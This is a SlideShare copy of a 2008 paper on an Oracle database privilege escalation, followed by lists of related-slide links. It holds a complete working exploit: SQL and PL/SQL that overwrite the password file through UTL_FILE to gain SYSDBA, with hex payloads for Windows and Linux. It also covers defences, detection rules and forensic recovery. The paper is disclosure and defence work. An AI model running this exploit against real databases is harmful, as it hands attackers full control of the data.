SlideShare uma empresa Scribd logo

Create Any Directory To SYSDBA

Noman Jahangir
Noman Jahangir

Create Any Directory To SYSDBA

EducaçãoTecnologia
1 de 8
Baixar para ler offline
1 CREATE ANY DIRECTORY to SYSDBA http://www.oracleforensics.com/wordpress/index.php/2008/10/10/create-any-directory-to-sysdba/ Paul M. Wright 06/10/2008 http://www.oracleforensics.com 1. Introduction .....................................................................................................................1 2. Create user with CREATE ANY DIRECTORY and CREATE SESSION .............................1 3. Find the password file location ........................................................................................2 4. Create the directory.........................................................................................................2 5. Overwrite the secret password file with a known password file to gain SYSDBA ..............3 6. How to defend against this? ............................................................................................5 7. Forensic Response .........................................................................................................6 8. Conclusions. ...................................................................................................................8 1. Introduction An Oracle DB user which has been granted CREATE ANY DIRECTORY can use that system privilege to grant themselves the SYSDBA system privilege by creating a DIRECTORY pointing to the password file location on the OS and then overwriting it with a previously prepared known password file using UTL_FILE.PUT_RAW from within the DB. This paper will show how the issue can be exploited and most importantly how to secure against it. This is an original vulnerability affecting current versions of the DB and please note that Oracle Corp’s Security Department have already been informed in accordance with ethical procedures. (Proof of concept code tested on 10.1, 10.2 and 11g on both Linux and Windows). 2.Create user with CREATE ANY DIRECTORY and CREATE SESSION C:SQLPLUS SYS/ORCL@192.168.1.137/ORCL AS SYSDBA SQL> CREATE USER CDTEST IDENTIFIED BY CDTEST; User created. SQL> GRANT CREATE SESSION TO CDTEST; Grant succeeded. SQL> GRANT CREATE ANY DIRECTORY TO CDTEST; SQL> SELECT * FROM V$PWFILE_USERS; --Only SYS is SYSDBA currently USERNAME SYSDB SYSOP ------------------------------ ----- ----- SYS TRUE TRUE
2 3. Find the password file location $ORACLE_HOME/dbs/orapw$ORACLE_SID --on Unix %ORACLE_HOME%databasePWD%ORACLE_SID%.ora --on Windows –-connect as non SYSDBA (with just CREATE ANY DIRECTORY and CREATE SESSION) SQL> CONN CDTEST/CDTEST Connected. --can infer probable location via other DIRECTORYs that may exist. --note that when a DIRECTORY is created by default PUBLIC is granted knowledge of it's existence through ALL_DIRECTORIES. SQL> SELECT * FROM ALL_DIRECTORIES; OWNER DIRECTORY_NAME DIRECTORY_PATH ----- ------------------------------ SYS DM_PMML_DIR F:oracleproduct10.1.0db_2dmadmin SYS LOG_FILE_DIR F:oracleproduct10.1.0db_2demoschemalog SYS DATA_FILE_DIR F:oracleproduct10.1.0db_2demoschemasales_history F:oracleproduct10.1.0db_2database is the password file location on windows. On Linux it is $ORACLE_HOME/dbs/ 4. Create the DIRECTORY SQL> CREATE OR REPLACE DIRECTORY TESTPASS AS 'F:ORACLEPRODUCT10.1.0DB_2DATABASE'; Directory created. Use PL/SQL to make a backup copy of the password file so that the overwritten password file can be replaced UTL_FILE has EXECUTE granted to PUBLIC by default. SQL> select grantee from dba_tab_privs where table_name='UTL_FILE'; GRANTEE ------------------------------ PUBLIC BEGIN utl_file.fcopy('TESTPASS', 'PWDorcl.ora', 'TESTPASS', 'PWDorcl.oraBU'); END; / SQL> BEGIN 2 utl_file.fcopy('TESTPASS', 'PWDorcl.ora', 'TESTPASS', 'PWDorcl.oraBU'); 3 END; 4 / PL/SQL procedure successfully completed.
3 5. Overwrite secret password file with known file to gain SYSDBA SQL> @createdirectory2sysdba.sql PL/SQL procedure successfully completed. --below are the contents of createdirectory2sysdba.sql --note windows adds 0D 0A to end as CTRL LF therefore removed 4 0's of password file to compensate --Oracle checks the size of the PWFILE not it's contents.. --WINDOWS VERSION 10.2.0.1.0 DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767); bu2 varchar2(32767); bu3 varchar2(32767); BEGIN bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b 5a000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776 f72642066696c650000001b004f52434c00000000000000000000000000000000000000000000 00000000040001000000000000000000000000000000000000000000000000000000000000004 94e5445524e414c00000000000000000000000000000000000000000000000008000000373639 4330434438343946394238423200000000000000000000000000000000100000000f000000000 00000000000000000000000000000000000000000000000000000535953000000000000000000 00000000000000000000000000000000000000000300000035363338323238444146353238303 54600000000000000000000000000000000100000000f'); bu3:=hextoraw('00000000000000000000000000000000000000000000000000000000000000 00000000000000000782af445359534d414e00000000000000000000000000000000000000000 00000000000060000004138443641453346343145463931454100000000000000000000000000 000000100000000b0000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000004344544553540000000000000000000000000000000000 00000000000000000006000000313438304144333244303842304543390000000000000000000 0000000000000100000000b000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000080 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000'); bu := hextoraw(bu2||bu3); fi:=UTL_FILE.fopen('TESTPASS','PWDorcl.ora','w',32767); UTL_FILE.put_raw(fi,bu,TRUE); UTL_FILE.fclose(fi); END; /
4 --Linux VERSION 10.2.0.1.0 adds 0A as LF therefore remove 2 0's to compensate DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767); bu2 varchar2(32767); bu3 varchar2(32767); BEGIN bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b 5a000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776 f72642066696c650000001b004f52434c00000000000000000000000000000000000000000000 00000000040001000000000000000000000000000000000000000000000000000000000000004 94e5445524e414c00000000000000000000000000000000000000000000000008000000373639 4330434438343946394238423200000000000000000000000000000000100000000f000000000 00000000000000000000000000000000000000000000000000000535953000000000000000000 00000000000000000000000000000000000000000300000035363338323238444146353238303 54600000000000000000000000000000000100000000f'); bu3:=hextoraw('00000000000000000000000000000000000000000000000000000000000000 00000000000000000782af445359534d414e00000000000000000000000000000000000000000 00000000000060000004138443641453346343145463931454100000000000000000000000000 000000100000000b0000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000004344544553540000000000000000000000000000000000 00000000000000000006000000313438304144333244303842304543390000000000000000000 0000000000000100000000b000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000080 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000'); bu := hextoraw(bu2||bu3); fi:=UTL_FILE.fopen('TESTPASS','orapworcl','w',32767); UTL_FILE.put_raw(fi,bu,TRUE); UTL_FILE.fclose(fi); END; / SQL> SELECT * FROM V$PWFILE_USERS; -- CDTEST is SYSDBA now USERNAME SYSDB SYSOP ------------------------------ ----- ----- SYS TRUE TRUE SYSMAN TRUE FALSE CDTEST TRUE FALSE
5 That is how to escalate from CREATE ANY DIRECTORY to SYSDBA and has been found to be reliable. This process relies on the fact that the Oracle DB allows DIRECTORY access to the password file location and allows UTL_FILE to overwrite the password file. Additionally the database does not check either the state via checksum or the timestamp of the password file to see whether it has been modified or indeed whether the password file was in fact created on a completely different database as is the case in this example. The Oracle DB only checks the size of the file is correct. Note: If the password file becomes corrupted you can recreate it using this command. orapwd file=PWDorcl.ora password=syspassword 6. How to defend against this? In addition to general DB hardening the analyst should REVOKE PUBLIC EXECUTE on UTL_FILE, and REVOKE CREATE ANY DIRECTORY from all but SYSDBA. Only SYSDBAs should be creating directories. Which roles, users and system privileges have CREATE ANY DIRECTORY? -DBA -IMP_FULL_DATABASE -WKSYS -SYS -SYSDBA and importantly any application that needs to create a DIRECTORY on the OS will also have CREATE ANY DIRECTORY. There may actually be quite a few of these and if the application was vulnerable to SQL injection then a Web app user may escalate to SYSDBA on the DB via the web app and then be able to ex-filtrate the data back to themselves via firewall egress. The following measures will help defend against the problem of being able to use CREATE ANY DIRECTORY to gain SYSDBA. 1. Don't grant CREATE ANY DIRECTORY to any user (only for SYSDBAs). 2. Delete all DIRECTORYs after usage. 3. Also check the last modified time on the password file. 4. Checksum the state of the password file. 5. Generally harden the DB to stop someone granting themselves CREATE ANY DIRECTORY. Additionally add a Sentrigo Hedgehog [1] rule to match on the location of the password file and another one to alert on the usage of CREATE ANY DIRECTORY. This is an easy one. statement CONTAINS 'F:oracleproduct10.1.0db_2database' statement CONTAINS 'create directory'
6 7. Forensic Response The problem with this attack and others of it's type is that because the highest privilege of SYSDBA is gained the attacker is free to cover their tracks and install a backdoor so that the attack appears not to have happened. SELECT * FROM DBA_DIRECTORIES; no results The attacker will have dropped the incriminating directory after creating the backdoor. This requires the DROP ANY DIRECTORY privilege, but since the attacker has gained SYSDBA this is not a problem. DROP DIRECTORY TESTPASS; So how to respond? … This is where Oracle Forensic skills come in very useful! Forensic investigation shows that the DIRECTORY path is persisted in SYSTEM01.dbf even after the DIRECTORY has been deleted and the DB restarted. All of the DIRECTORY paths are recorded in SYSTEM01.dbf and can be viewed using Hexedit[2] on Linux. SQL> create directory testpass as '/u01/app/oracle/oracle/product/10.2.0/db_4/dbs' 2 ; Directory created. hexedit and tab to the ascii and the ctrl s on the serarch dtring 00475320 00 00 00 00 00 00 00 00 00 2C 01 03 04 C3 06 37 .........,.....7 00475330 10 26 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D .&-------------- 00475340 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 00475350 2D 2D 2D 2D 2D 2D 2D 2D 2E 2F 75 30 31 2F 61 70 --------./u01/ap 00475360 70 2F 6F 72 61 63 6C 65 2F 6F 72 61 63 6C 65 2F p/oracle/oracle/ 00475370 70 72 6F 64 75 63 74 2F 31 30 2E 32 2E 30 2F 64 product/10.2.0/d 00475380 62 5F 34 2F 64 62 73 3C 02 03 04 C3 06 32 61 26 b_4/dbs<.....2a& 00475390 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- DROP DIRECTORY TESTPASS; COMMIT; SHUTDOWN IMMEDIATE; STARTUP; This is what the .dbf looks like after the DIRECTORY has been deleted and DB restarted...i.e. The DIRECTORY is still there in the .dbf .. 00475330 10 26 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D .&-------------- 00475340 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 00475350 2D 2D 2D 2D 2D 2D 2D 2D 2E 2F 75 30 31 2F 61 70 --------./u01/ap 00475360 70 2F 6F 72 61 63 6C 65 2F 6F 72 61 63 6C 65 2F p/oracle/oracle/ 00475370 70 72 6F 64 75 63 74 2F 31 30 2E 32 2E 30 2F 64 product/10.2.0/d 00475380 62 5F 34 2F 64 62 73 3C 02 03 04 C3 06 32 61 26 b_4/dbs<.....2a& 00475390 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 004753A0 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- The same is true for Windows as shown in the screenshot overleaf.
7 Figure 1 Windows DBF showing deleted directory paths after reboot So this tells the Forensic Examiner that a DIRECTORY has existed previously but no longer shows in DBA_DIRECTORIES i.e. it has been deleted! The DIRECTORY path shown in the .dbf is F:oracleproduct10.1.0db_2database' which points to the password file. It is interesting to note that DIRECTORY paths that were created most recently appear nearer the top of the list in the data file and descend. If there is a deleted DIRECTORY pointing to the password file, as per the example above, then the Forensic Analyst will need to check the system in detail for potential backdoors [3].
8 8. Conclusion To secure against this privilege escalation we now know to REVOKE CREATE ANY DIRECTORY, monitor the password file, DROP DIRECTORYs and REVOKE PUBLIC EXECUTE on UTL_FILE. However, the nub of the problem is that the Oracle DB has only two modes of operation for DIRECTORYs. Either you can't create DIRECTORYs at all OR you can create them where ever you want including on the password file or in C: on Windows. There should, in the Author's opinion, be a finer level of control over the allocation of privilege to create DIRECTORYs within the Oracle DB. This finer level of control should include the ability to restrict access to particular parts of the OS and perhaps in future evolve to enable allocation of a privilege for a given duration for use at a specific time i.e. user W needs privilege X for duration Y at time Z. In the shorter term the Oracle DB could be improved by making it check the state and timestamp of the password file in addition to the size of the file as it does currently. This is a core forensic concept as outlined in the first book [4] on the subject of Database Forensics [5]. Any questions about this paper email the Author at paul.wright@oracleforensics.com 9. References 1. http://www.oracleforensics.com/wordpress/index.php/2008/09/14/sentrigo-solves-db-security-problems/ 2. http://www.physics.ohio-state.edu/~prewett/hexedit/ 3. http://www.oracleforensics.com/oraclesysdbabackdoor.pdf 4. Oracle Forensics – Oracle Security Best Practices - Paul M. Wright ISBN 0-9776715-2-6 ISBN 13 978-0977671526 Library of Congress Number 2007930081 Publication Date - May 2008 by Rampant Tech Press http://www.rampant-books.com/book_2007_1_oracle_forensics.htm 5. http://en.wikipedia.org/w/index.php?title=Database_Forensics&action=history

Recomendados

12c (12.1) Database installation on Solaris 11(11.2)
12c (12.1) Database installation on Solaris 11(11.2)12c (12.1) Database installation on Solaris 11(11.2)
12c (12.1) Database installation on Solaris 11(11.2)K Kumar Guduru
 
D space manual
D space manualD space manual
D space manualBibliounivbtn
 
Most frequently used unix commands for database administrator
Most frequently used unix commands for database administratorMost frequently used unix commands for database administrator
Most frequently used unix commands for database administratorDinesh jaisankar
 
Installing and Configuring Domino 10 on CentOS 7
Installing and Configuring Domino 10 on CentOS 7Installing and Configuring Domino 10 on CentOS 7
Installing and Configuring Domino 10 on CentOS 7Devin Olson
 
Terraform Cosmos DB
Terraform Cosmos DBTerraform Cosmos DB
Terraform Cosmos DBMoisés Elías Araya
 
Docker security
Docker securityDocker security
Docker securityJanos Suto
 
Build MySQL virtual enviroment
Build MySQL virtual enviromentBuild MySQL virtual enviroment
Build MySQL virtual enviromentTaras Vasylyuk
 
Build moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longer
Build moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longerBuild moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longer
Build moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longerLifeng (Aaron) Han
 

Recomendados

12c (12.1) Database installation on Solaris 11(11.2)
12c (12.1) Database installation on Solaris 11(11.2)12c (12.1) Database installation on Solaris 11(11.2)
12c (12.1) Database installation on Solaris 11(11.2)K Kumar Guduru
 
D space manual
D space manualD space manual
D space manualBibliounivbtn
 
Most frequently used unix commands for database administrator
Most frequently used unix commands for database administratorMost frequently used unix commands for database administrator
Most frequently used unix commands for database administratorDinesh jaisankar
 
Installing and Configuring Domino 10 on CentOS 7
Installing and Configuring Domino 10 on CentOS 7Installing and Configuring Domino 10 on CentOS 7
Installing and Configuring Domino 10 on CentOS 7Devin Olson
 
Terraform Cosmos DB
Terraform Cosmos DBTerraform Cosmos DB
Terraform Cosmos DBMoisés Elías Araya
 
Docker security
Docker securityDocker security
Docker securityJanos Suto
 
Build MySQL virtual enviroment
Build MySQL virtual enviromentBuild MySQL virtual enviroment
Build MySQL virtual enviromentTaras Vasylyuk
 
Build moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longer
Build moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longerBuild moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longer
Build moses on ubuntu (64 bit) system in virtubox recorded by aaron _v2longerLifeng (Aaron) Han
 
Freeradius edir
Freeradius edirFreeradius edir
Freeradius edirJonas Segovia Velazquez
 
Howtoinstallarchlinuxtousb final-120610172253-phpapp01
Howtoinstallarchlinuxtousb final-120610172253-phpapp01Howtoinstallarchlinuxtousb final-120610172253-phpapp01
Howtoinstallarchlinuxtousb final-120610172253-phpapp01decenttr
 
Domino9on centos6
Domino9on centos6Domino9on centos6
Domino9on centos6a8us
 
Oracle11g On Fedora14
Oracle11g On Fedora14Oracle11g On Fedora14
Oracle11g On Fedora14kmsa
 
Component pack 6006 install guide
Component pack 6006 install guideComponent pack 6006 install guide
Component pack 6006 install guideRoberto Boccadoro
 
Red Hat Enterprise Linux 5.2 Virtualization Guide
Red Hat Enterprise Linux 5.2 Virtualization GuideRed Hat Enterprise Linux 5.2 Virtualization Guide
Red Hat Enterprise Linux 5.2 Virtualization GuideRishi Sharma
 
Plesk 8.2 for Linux/Unix Domain Administrator's Guide
Plesk 8.2 for Linux/Unix Domain Administrator's GuidePlesk 8.2 for Linux/Unix Domain Administrator's Guide
Plesk 8.2 for Linux/Unix Domain Administrator's Guidewebhostingguy
 
Plesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXPlesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXwebhostingguy
 
Plesk 8 Client's Guide
Plesk 8 Client's GuidePlesk 8 Client's Guide
Plesk 8 Client's Guidewebhostingguy
 
003 red hat-enterprise_linux-6-dm_multipath-en-us
003 red hat-enterprise_linux-6-dm_multipath-en-us003 red hat-enterprise_linux-6-dm_multipath-en-us
003 red hat-enterprise_linux-6-dm_multipath-en-usGanesh Bagde
 
How to Install ArchLinux to a USB Flashdrive in 2012
How to Install ArchLinux to a USB Flashdrive in 2012How to Install ArchLinux to a USB Flashdrive in 2012
How to Install ArchLinux to a USB Flashdrive in 2012Chukwuma Onyeije, MD, FACOG
 
Logfile
LogfileLogfile
LogfileCatalina Garcia Talamilla
 
Plesk 8.1 for Linux/UNIX
Plesk 8.1 for Linux/UNIXPlesk 8.1 for Linux/UNIX
Plesk 8.1 for Linux/UNIXwebhostingguy
 
Ubuntu Practice and Configuration
Ubuntu Practice and ConfigurationUbuntu Practice and Configuration
Ubuntu Practice and ConfigurationManoj Sahu
 
hier
hierhier
hierbutest
 
Lab docker
Lab dockerLab docker
Lab dockerBruno Cornec
 
Sudo
SudoSudo
SudoHemakumar.S
 
Red hat enterprise_linux-7-beta-installation_guide-en-us
Red hat enterprise_linux-7-beta-installation_guide-en-usRed hat enterprise_linux-7-beta-installation_guide-en-us
Red hat enterprise_linux-7-beta-installation_guide-en-usmuhammad adeel
 
Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdbafangjiafu
 
CIS Docker Benchmark v1.5.0 PDF.pdf
CIS Docker Benchmark v1.5.0 PDF.pdfCIS Docker Benchmark v1.5.0 PDF.pdf
CIS Docker Benchmark v1.5.0 PDF.pdfSantanuJoshi3
 
Maa wp-10g-racprimaryracphysicalsta-131940
Maa wp-10g-racprimaryracphysicalsta-131940Maa wp-10g-racprimaryracphysicalsta-131940
Maa wp-10g-racprimaryracphysicalsta-131940gopalchsamanta
 
Linux configer
Linux configerLinux configer
Linux configerMD. AL AMIN
 

Mais conteúdo relacionado

Mais procurados

Howtoinstallarchlinuxtousb final-120610172253-phpapp01
Howtoinstallarchlinuxtousb final-120610172253-phpapp01Howtoinstallarchlinuxtousb final-120610172253-phpapp01
Howtoinstallarchlinuxtousb final-120610172253-phpapp01decenttr
 
Domino9on centos6
Domino9on centos6Domino9on centos6
Domino9on centos6a8us
 
Oracle11g On Fedora14
Oracle11g On Fedora14Oracle11g On Fedora14
Oracle11g On Fedora14kmsa
 
Component pack 6006 install guide
Component pack 6006 install guideComponent pack 6006 install guide
Component pack 6006 install guideRoberto Boccadoro
 
Red Hat Enterprise Linux 5.2 Virtualization Guide
Red Hat Enterprise Linux 5.2 Virtualization GuideRed Hat Enterprise Linux 5.2 Virtualization Guide
Red Hat Enterprise Linux 5.2 Virtualization GuideRishi Sharma
 
Plesk 8.2 for Linux/Unix Domain Administrator's Guide
Plesk 8.2 for Linux/Unix Domain Administrator's GuidePlesk 8.2 for Linux/Unix Domain Administrator's Guide
Plesk 8.2 for Linux/Unix Domain Administrator's Guidewebhostingguy
 
Plesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXPlesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXwebhostingguy
 
Plesk 8 Client's Guide
Plesk 8 Client's GuidePlesk 8 Client's Guide
Plesk 8 Client's Guidewebhostingguy
 
003 red hat-enterprise_linux-6-dm_multipath-en-us
003 red hat-enterprise_linux-6-dm_multipath-en-us003 red hat-enterprise_linux-6-dm_multipath-en-us
003 red hat-enterprise_linux-6-dm_multipath-en-usGanesh Bagde
 
How to Install ArchLinux to a USB Flashdrive in 2012
How to Install ArchLinux to a USB Flashdrive in 2012How to Install ArchLinux to a USB Flashdrive in 2012
How to Install ArchLinux to a USB Flashdrive in 2012Chukwuma Onyeije, MD, FACOG
 
Plesk 8.1 for Linux/UNIX
Plesk 8.1 for Linux/UNIXPlesk 8.1 for Linux/UNIX
Plesk 8.1 for Linux/UNIXwebhostingguy
 
Ubuntu Practice and Configuration
Ubuntu Practice and ConfigurationUbuntu Practice and Configuration
Ubuntu Practice and ConfigurationManoj Sahu
 
Red hat enterprise_linux-7-beta-installation_guide-en-us
Red hat enterprise_linux-7-beta-installation_guide-en-usRed hat enterprise_linux-7-beta-installation_guide-en-us
Red hat enterprise_linux-7-beta-installation_guide-en-usmuhammad adeel
 

Mais procurados (18)

Freeradius edir
Freeradius edirFreeradius edir
Freeradius edir
 
Howtoinstallarchlinuxtousb final-120610172253-phpapp01
Howtoinstallarchlinuxtousb final-120610172253-phpapp01Howtoinstallarchlinuxtousb final-120610172253-phpapp01
Howtoinstallarchlinuxtousb final-120610172253-phpapp01
 
Domino9on centos6
Domino9on centos6Domino9on centos6
Domino9on centos6
 
Oracle11g On Fedora14
Oracle11g On Fedora14Oracle11g On Fedora14
Oracle11g On Fedora14
 
Component pack 6006 install guide
Component pack 6006 install guideComponent pack 6006 install guide
Component pack 6006 install guide
 
Red Hat Enterprise Linux 5.2 Virtualization Guide
Red Hat Enterprise Linux 5.2 Virtualization GuideRed Hat Enterprise Linux 5.2 Virtualization Guide
Red Hat Enterprise Linux 5.2 Virtualization Guide
 
Plesk 8.2 for Linux/Unix Domain Administrator's Guide
Plesk 8.2 for Linux/Unix Domain Administrator's GuidePlesk 8.2 for Linux/Unix Domain Administrator's Guide
Plesk 8.2 for Linux/Unix Domain Administrator's Guide
 
Plesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXPlesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIX
 
Plesk 8 Client's Guide
Plesk 8 Client's GuidePlesk 8 Client's Guide
Plesk 8 Client's Guide
 
003 red hat-enterprise_linux-6-dm_multipath-en-us
003 red hat-enterprise_linux-6-dm_multipath-en-us003 red hat-enterprise_linux-6-dm_multipath-en-us
003 red hat-enterprise_linux-6-dm_multipath-en-us
 
How to Install ArchLinux to a USB Flashdrive in 2012
How to Install ArchLinux to a USB Flashdrive in 2012How to Install ArchLinux to a USB Flashdrive in 2012
How to Install ArchLinux to a USB Flashdrive in 2012
 
Logfile
LogfileLogfile
Logfile
 
Plesk 8.1 for Linux/UNIX
Plesk 8.1 for Linux/UNIXPlesk 8.1 for Linux/UNIX
Plesk 8.1 for Linux/UNIX
 
Ubuntu Practice and Configuration
Ubuntu Practice and ConfigurationUbuntu Practice and Configuration
Ubuntu Practice and Configuration
 
hier
hierhier
hier
 
Lab docker
Lab dockerLab docker
Lab docker
 
Sudo
SudoSudo
Sudo
 
Red hat enterprise_linux-7-beta-installation_guide-en-us
Red hat enterprise_linux-7-beta-installation_guide-en-usRed hat enterprise_linux-7-beta-installation_guide-en-us
Red hat enterprise_linux-7-beta-installation_guide-en-us
 

Semelhante a Create Any Directory To SYSDBA

Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdbafangjiafu
 
CIS Docker Benchmark v1.5.0 PDF.pdf
CIS Docker Benchmark v1.5.0 PDF.pdfCIS Docker Benchmark v1.5.0 PDF.pdf
CIS Docker Benchmark v1.5.0 PDF.pdfSantanuJoshi3
 
Maa wp-10g-racprimaryracphysicalsta-131940
Maa wp-10g-racprimaryracphysicalsta-131940Maa wp-10g-racprimaryracphysicalsta-131940
Maa wp-10g-racprimaryracphysicalsta-131940gopalchsamanta
 
Unix Security
Unix SecurityUnix Security
Unix Securityreplay21
 
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...ThomasElling1
 
Installing oracle grid infrastructure and database 12c r1
Installing oracle grid infrastructure and database 12c r1Installing oracle grid infrastructure and database 12c r1
Installing oracle grid infrastructure and database 12c r1Voeurng Sovann
 
Freenas Tutorial EuroBSDCon 2012
Freenas Tutorial EuroBSDCon 2012Freenas Tutorial EuroBSDCon 2012
Freenas Tutorial EuroBSDCon 2012Dru Lavigne
 
Asian Spirit 3 Day Dba On Ubl
Asian Spirit 3 Day Dba On UblAsian Spirit 3 Day Dba On Ubl
Asian Spirit 3 Day Dba On Ublnewrforce
 
Create manula and automaticly database
Create manula and automaticly databaseCreate manula and automaticly database
Create manula and automaticly databaseAnar Godjaev
 
Installing & Configuring IBM Domino 9 on CentOS
Installing & Configuring IBM Domino 9 on CentOSInstalling & Configuring IBM Domino 9 on CentOS
Installing & Configuring IBM Domino 9 on CentOSDevin Olson
 
Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...webhostingguy
 
Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...webhostingguy
 
Oracle12c Pluggable Database Hands On - TROUG 2014
Oracle12c Pluggable Database Hands On - TROUG 2014Oracle12c Pluggable Database Hands On - TROUG 2014
Oracle12c Pluggable Database Hands On - TROUG 2014Özgür Umut Vurgun
 
Introduction to JumpStart
Introduction to JumpStartIntroduction to JumpStart
Introduction to JumpStartScott McDermott
 
Hdf installing-hdf
Hdf installing-hdfHdf installing-hdf
Hdf installing-hdfnmrrsc
 
Kubernetes Story - Day 1: Build and Manage Containers with Podman
Kubernetes Story - Day 1: Build and Manage Containers with PodmanKubernetes Story - Day 1: Build and Manage Containers with Podman
Kubernetes Story - Day 1: Build and Manage Containers with PodmanMihai Criveti
 

Semelhante a Create Any Directory To SYSDBA (20)

Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdba
 
CIS Docker Benchmark v1.5.0 PDF.pdf
CIS Docker Benchmark v1.5.0 PDF.pdfCIS Docker Benchmark v1.5.0 PDF.pdf
CIS Docker Benchmark v1.5.0 PDF.pdf
 
Maa wp-10g-racprimaryracphysicalsta-131940
Maa wp-10g-racprimaryracphysicalsta-131940Maa wp-10g-racprimaryracphysicalsta-131940
Maa wp-10g-racprimaryracphysicalsta-131940
 
Linux configer
Linux configerLinux configer
Linux configer
 
Unix Security
Unix SecurityUnix Security
Unix Security
 
Acl libro
Acl libroAcl libro
Acl libro
 
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
 
Installing oracle grid infrastructure and database 12c r1
Installing oracle grid infrastructure and database 12c r1Installing oracle grid infrastructure and database 12c r1
Installing oracle grid infrastructure and database 12c r1
 
Freenas Tutorial EuroBSDCon 2012
Freenas Tutorial EuroBSDCon 2012Freenas Tutorial EuroBSDCon 2012
Freenas Tutorial EuroBSDCon 2012
 
Asian Spirit 3 Day Dba On Ubl
